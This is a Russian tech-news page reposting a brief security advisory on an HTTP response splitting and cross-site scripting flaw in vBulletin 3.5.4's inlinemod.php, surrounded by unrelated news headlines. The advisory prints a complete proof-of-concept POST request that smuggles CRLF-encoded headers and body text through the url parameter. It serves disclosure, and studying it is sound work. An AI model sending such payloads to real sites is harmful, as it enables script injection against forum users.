Уязвимость HTTP Response Splitting в vBulletin - «Интернет»
sitename
WhatsApp переизобрёл голосовую почту — и получил другие нововведения с последним крупным обновлением - «Новости сети»
WhatsApp переизобрёл голосовую почту — и получил другие нововведения с последним крупным обновлением - «Новости сети»
 «Рождество наступило раньше времени»: создатели второго сезона сериала «Фоллаут» обрадовали фанатов переносом премьеры - «Новости сети»
«Рождество наступило раньше времени»: создатели второго сезона сериала «Фоллаут» обрадовали фанатов переносом премьеры - «Новости сети»
 Продажи Hollow Knight: Silksong превысили 7 миллионов копий — анонсировано большое бесплатное дополнение Sea of Sorrow - «Новости сети»
Продажи Hollow Knight: Silksong превысили 7 миллионов копий — анонсировано большое бесплатное дополнение Sea of Sorrow - «Новости сети»
 Британия предлагает встроить цензуру прямо в iOS и Android — доступ к обнажёнке только после проверки возраста - «Новости сети»
Британия предлагает встроить цензуру прямо в iOS и Android — доступ к обнажёнке только после проверки возраста - «Новости сети»
 $3 млрд за лояльность: как Tesla превратила совет директоров в группу поддержки Илона Маска - «Новости сети»
$3 млрд за лояльность: как Tesla превратила совет директоров в группу поддержки Илона Маска - «Новости сети»
 Escape from Tarkov вошла в Зал Славы видеоигровой индустрии России - «Новости сети»
Escape from Tarkov вошла в Зал Славы видеоигровой индустрии России - «Новости сети»
 В этот день 15 лет назад перестал выходить на связь создатель биткоина Сатоши Накамото - «Новости сети»
В этот день 15 лет назад перестал выходить на связь создатель биткоина Сатоши Накамото - «Новости сети»
 Впервые учёные наблюдали настоящую алхимию — солнечный нейтрино превратил изотоп углерода в азот - «Новости сети»
Впервые учёные наблюдали настоящую алхимию — солнечный нейтрино превратил изотоп углерода в азот - «Новости сети»
 Замена трёхстворчатого дисплея у Samsung Galaxy Z TriFold обойдётся дороже новенького Galaxy S25 Ultra - «Новости сети»
Замена трёхстворчатого дисплея у Samsung Galaxy Z TriFold обойдётся дороже новенького Galaxy S25 Ultra - «Новости сети»
 Netflix нашла в YouTube оправдание для поглощения Warner Bros — антимонопольщики вряд ли купятся - «Новости сети»
Netflix нашла в YouTube оправдание для поглощения Warner Bros — антимонопольщики вряд ли купятся - «Новости сети»
Новости мира Интернет » Новости » Новости мира Интернет » Уязвимость HTTP Response Splitting в vBulletin - «Интернет»

✔Уязвимость HTTP Response Splitting в vBulletin - «Интернет»

19 марта 2024 875 Новости / Новости мира Интернет 0

Программа: vBulletin 3.5.4
Опасность: Низкая
Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

Уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

POST /vb354/inlinemod.php HTTP/1.0
Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1
Content-Length: 93
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: www.vulnerable.com
Content-Type: application/x-www-form-urlencoded
do=clearthread&url=lala2%0d%0aContent-Length: 33%0d%0a%0d%0aHacked!%0d%0a%0d%0a

Уязвимость обнаружил Агиевич Игорь aka Shanker (shanker@mail.ru)

URL производителя: http://www.vbulletin.com

Цитирование статьи, картинки - фото скриншот - Rambler News Service.
Иллюстрация к статье - Яндекс. Картинки.
Есть вопросы. Напишите нам.
Общие правила  поведения на сайте.

Программа: vBulletin 3.5.4 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметре url сценария inlinemod.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:POST /vb354/inlinemod.php HTTP/1.0 Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1 Content-Length: 93 Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Host: www.vulnerable.com Content-Type: application/x-www-form-urlencoded do=clearthread
CSS, сценария vBulletin inlinemod.php. Удаленный входных
запостил(а)
Little
Вернуться назад
0

Смотрите также

А что там на главной? )))


Комментарии )))
Забыли пароль? Регистрация